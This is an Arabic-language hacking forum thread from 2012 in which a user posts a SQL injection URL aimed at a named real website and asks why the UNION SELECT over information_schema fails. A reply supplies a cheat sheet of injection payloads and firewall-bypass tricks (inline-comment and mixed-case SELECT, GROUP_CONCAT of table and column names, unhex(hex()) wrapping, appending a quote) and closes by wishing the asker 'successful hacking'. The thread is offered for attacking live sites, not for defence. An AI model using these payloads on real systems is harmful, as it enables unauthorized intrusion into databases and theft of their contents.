:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)
-   -   [حل مشكلة] not found (http://www.vbspiders.com/vb/showthread.php?t=61442)

Mr ToMaHoK 03-22-2012 01:16 AM
not found
 
عند حقن الموقع طلعة عدد الاعمد

وجدول مصاب و اصدار القاعدة

لكن عند هده الحقن طلع not found
كود PHP:
http://growradio.org/show.php?id=-63+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12+from+information_schema.columns-- 

Dr.Unkn0wn 03-22-2012 01:29 AM
رد: not found
 

MO3ETH 03-22-2012 09:05 PM
رد: not found
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Mr ToMaHoK (المشاركة 431024)
عند حقن الموقع طلعة عدد الاعمد

وجدول مصاب و اصدار القاعدة

لكن عند هده الحقن طلع not found
كود PHP:
http://growradio.org/show.php?id=-63+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12+from+information_schema.columns-- 
==============================
أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة
==============================
تخطي Forbidden 403 اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
ليصبح بهذا الشكل
==============================
+
==============================
from+information_schema./*!columns*/+where+table_schema=database()--
==============================
أوامر تخطي Not Acceptable
==============================
تخطي Not Acceptable اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي
Not Acceptable
اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
تخطي Not Acceptable اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
أوامر تخطي الحماية من بعض الأوامر
==============================
هذا الأمر نضعه مكان العامود المصاب
==============================
concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
==============================
وهذا الأمر نضعه في نهاية الرابط
==============================
+from+information_schema.columns--
==============================
أوامر تخطي عدم ظهور عدد الأعمدة
==============================
نقوم باضافة
==============================
+--+
==============================
في نهاية الرابط
==============================
واضافة
العلامة التي بين قوسين
==============================
(')
==============================
بعد
==============================
.php?id=1
==============================
ليصبح بهذا الشكل
==============================
.php?id=1'
==============================

أرجو لك الإفادة و إختراق موفق

Mr ToMaHoK 03-23-2012 02:10 PM
رد: not found
 
شكر لك اخي


الساعة الآن 09:25 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0